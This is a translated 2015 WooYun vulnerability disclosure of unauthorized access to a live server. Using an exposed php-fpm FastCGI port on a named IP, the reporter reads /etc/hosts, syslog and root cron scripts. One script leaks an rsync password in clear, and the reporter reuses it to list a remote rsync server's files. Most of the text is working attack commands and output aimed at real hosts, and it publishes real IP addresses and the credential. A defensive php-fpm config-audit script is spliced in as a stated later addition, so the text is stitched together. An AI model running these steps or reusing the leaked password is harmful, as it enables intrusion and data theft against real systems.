WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
WooYun Drops articles, browse online--------http://drop.zone.ci/
2015-02-04: Details have been reported to the vendor and are awaiting vendor handling
2015-02-09: The vendor has actively ignored the vulnerability; details are disclosed to the public
As the title says.
Still the FastCGI problem, on the IP 222.134.66.98.
```text
[root@localhost fastcgi]$ /usr/local/php/bin/php fcgiget.php 222.134.66.98:9000/etc/hosts
X-Powered-By: PHP/5.2.6-3ubuntu4.6
Content-type: text/html

127.0.0.1 localhost
222.134.66.98 ubuntu
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
58.249.119.209 smproxy1.yy.duowan.com
112.65.241.7 smproxy2.yy.duowan.com
59.151.23.85 smproxy3.yy.duowan.com
106.38.198.9 manager.repos.yy.duowan.com
118.26.226.207 sdaemon.yy.duowan.com
58.249.119.217 sdaemon2.yy.duowan.com
58.248.187.58 yycookie.yy.duowan.com
58.249.119.217 rdaemon.yy.duowan.com
118.26.226.207 rdaemon2.yy.duowan.com
58.249.119.217 relayDaemon.yy.duowan.com
118.26.226.207 relayDaemon2.yy.duowan.com
58.249.119.211 balance.yy.duowan.com
221.228.79.31 bc.yy.duowan.com
221.228.79.32 bc2.yy.duowan.com
121.14.37.153 config.yy.duowan.com
58.215.46.21 mirror.yy.duowan.com
121.14.43.142 oams.yy.duowan.com
106.38.255.130 oams2.yy.duowan.com
```
Let's read syslog:
```text
[root@localhost fastcgi]$ /usr/local/php/bin/php fcgiget.php 222.134.66.98:9000/var/log/syslog|grep rsync
Feb 4 05:30:01 ubuntu /USR/SBIN/CRON[7100]: (root) CMD (/bin/bash /home/dspeak/rsync_jifen.sh)
Feb 4 05:30:01 ubuntu /USR/SBIN/CRON[7102]: (root) CMD (/bin/bash /home/dspeak/check_rsync_jifen.sh)
Feb 4 05:40:01 ubuntu /USR/SBIN/CRON[19136]: (root) CMD (rsync -avzP /data/yy/log/STATLOG/*.gz [email protected]::sys_log/222_134_66_98 --password-file=/data/yy/log/STATLOG/pass.scr)
Feb 4 06:00:01 ubuntu /USR/SBIN/CRON[7887]: (root) CMD (/bin/bash /home/dspeak/rsync_jifen.sh)
Feb 4 06:00:01 ubuntu /USR/SBIN/CRON[7892]: (root) CMD (/bin/bash /home/dspeak/check_rsync_jifen.sh)
Feb 4 06:30:01 ubuntu /USR/SBIN/CRON[11029]: (root) CMD (/bin/bash /home/dspeak/rsync_jifen.sh)
Feb 4 06:30:01 ubuntu /USR/SBIN/CRON[11034]: (root) CMD (/bin/bash /home/dspeak/check_rsync_jifen.sh)
Feb 4 07:00:01 ubuntu /USR/SBIN/CRON[11999]: (root) CMD (/bin/bash /home/dspeak/check_rsync_jifen.sh)
Feb 4 07:00:01 ubuntu /USR/SBIN/CRON[12004]: (root) CMD (/bin/bash /home/dspeak/rsync_jifen.sh)
```
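The root cause of the reads above is a php-fpm FastCGI listener bound to a routable address. As an added defender-side check that is not part of the original report, the script below audits php-fpm pool configuration for that pattern; the pool file is a constructed sample, and the root-worker rule is an extra hardening check the report itself does not state.

```python
import configparser
import ipaddress

# Constructed php-fpm pool configuration (not taken from the host in the report).
# Pool [www] reproduces the exposure pattern: FastCGI on every interface, no
# client allow-list, and the worker running as root.
SAMPLE_POOL_CONF = """
[www]
listen = 0.0.0.0:9000
user = root

[internal]
listen = 127.0.0.1:9000
listen.allowed_clients = 127.0.0.1

[sock]
listen = /var/run/php-fpm.sock
user = www-data
"""


def listen_is_network_reachable(listen):
    """True if a php-fpm 'listen' value binds a TCP address other than loopback.
    Accepted forms: 'port', 'addr:port', '[v6addr]:port', '/path/to/socket'."""
    listen = listen.strip()
    if not listen or listen.startswith("/"):
        return False  # Unix socket: only local processes can connect
    if ":" in listen:
        host = listen.rsplit(":", 1)[0].strip("[]")
    else:
        host = ""  # bare port: php-fpm binds every interface
    if host in ("", "0.0.0.0", "::"):
        return True
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        return True  # hostname rather than address: treat as reachable


def audit_fpm_pools(conf_text):
    """Return [(pool, finding)] for pools that repeat the report's mistakes."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(conf_text)
    findings = []
    for pool in cp.sections():
        listen = cp.get(pool, "listen", fallback="")
        allowed = cp.get(pool, "listen.allowed_clients", fallback="").strip()
        if listen_is_network_reachable(listen) and not allowed:
            findings.append((pool, "FastCGI reachable from the network, no listen.allowed_clients"))
        if cp.get(pool, "user", fallback="").strip() == "root":
            findings.append((pool, "worker runs as root, so any file read via FastCGI is a root read"))
    return findings


if __name__ == "__main__":
    for pool, finding in audit_fpm_pools(SAMPLE_POOL_CONF):
        print(f"[{pool}] {finding}")
```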
The file /home/dspeak/rsync_jifen.sh:
```bash
if [ "$ispType" = "5" ] ; then
    # CNC
    rsyncServerList="58.249.117.105 122.13.149.246 111.206.234.120"
else
    # OTHER ISP
    rsyncServerList="121.14.39.137 121.14.43.217 106.38.255.155"
fi
....
for file in $syncList ; do
    flag=0
    for rsyncServer in $rsyncServerList ; do
        rsync -az --password-file=/etc/rsync.scr $file jifen@${rsyncServer}::jifen/$ip/ ; rc=$?
        if [ $rc -eq 0 ] ; then
            info_short_log "sync file [$file] to [$rsyncServer] succeed , rc=[$rc]"
        else
            err_short_log "sync file [$file] to [$rsyncServer] failed , rc=[$rc]"
        fi
        ((flag+=$rc))
    done
```
Then some file contains this password; I forget exactly which one, sorry.
```bash
echo 1qazxcv > /etc/rsync.scr
chmod 600 /etc/rsync.scr
else
    if [ ! -s /etc/rsync.scr ];then
        echo 1qazxcv > /etc/rsync.scr
        chmod 600 /etc/rsync.scr
    fi
```
I don't know what the contents are; I can't make sense of them.
```text
[root@localhost fastcgi]$ rsync [email protected]::jifen |more
Password:
drwxr-xr-x       102400 2015/02/03 14:00:13 .
drwxr-xr-x        36864 2015/02/04 15:00:06 101.226.185.140
drwxr-xr-x        32768 2015/02/04 15:30:14 101.226.185.145
drwxr-xr-x        49152 2015/02/04 15:30:04 101.226.185.39
drwxr-xr-x        53248 2015/02/04 15:30:06 101.226.185.40
drwxr-xr-x        36864 2015/02/04 15:30:08 101.226.185.41
drwxr-xr-x        36864 2015/02/04 15:30:03 101.226.185.44
drwxr-xr-x        28672 2015/02/04 15:30:01 101.226.185.45
drwxr-xr-x        36864 2015/02/04 15:30:02 101.226.185.46
drwxr-xr-x        36864 2015/02/04 15:30:04 101.226.185.47
drwxr-xr-x        36864 2015/02/04 15:30:02 101.226.185.48
drwxr-xr-x        36864 2015/02/04 15:30:08 101.226.185.49
drwxr-xr-x        36864 2015/02/04 15:30:02 101.226.185.50
drwxr-xr-x        36864 2015/02/04 15:30:18 101.226.185.51
drwxr-xr-x        36864 2015/02/04 15:30:03 101.226.185.52
drwxr-xr-x        36864 2015/02/04 15:30:04 101.226.185.53
drwxr-xr-x        36864 2015/02/04 15:30:09 101.226.185.54
drwxr-xr-x        36864 2015/02/04 15:30:03 101.226.185.55
drwxr-xr-x        32768 2015/02/04 15:30:02 101.226.185.59
drwxr-xr-x        36864 2015/02/04 15:30:07 101.226.185.60
drwxr-xr-x        36864 2015/02/04 15:30:06 101.226.185.61
drwxr-xr-x        36864 2015/02/04 15:30:02 101.226.185.62
drwxr-xr-x         4096 2015/02/04 14:30:02 101.4.56.118
drwxr-xr-x         4096 2015/02/04 14:30:06 101.4.56.84
drwxr-xr-x         4096 2015/02/04 15:00:02 101.4.56.85
drwxr-xr-x         4096 2015/02/04 14:30:02 101.4.56.86
```
Access control
Hazard level: no impact, vendor ignored
Time ignored: 2015-02-09 16:02
None yet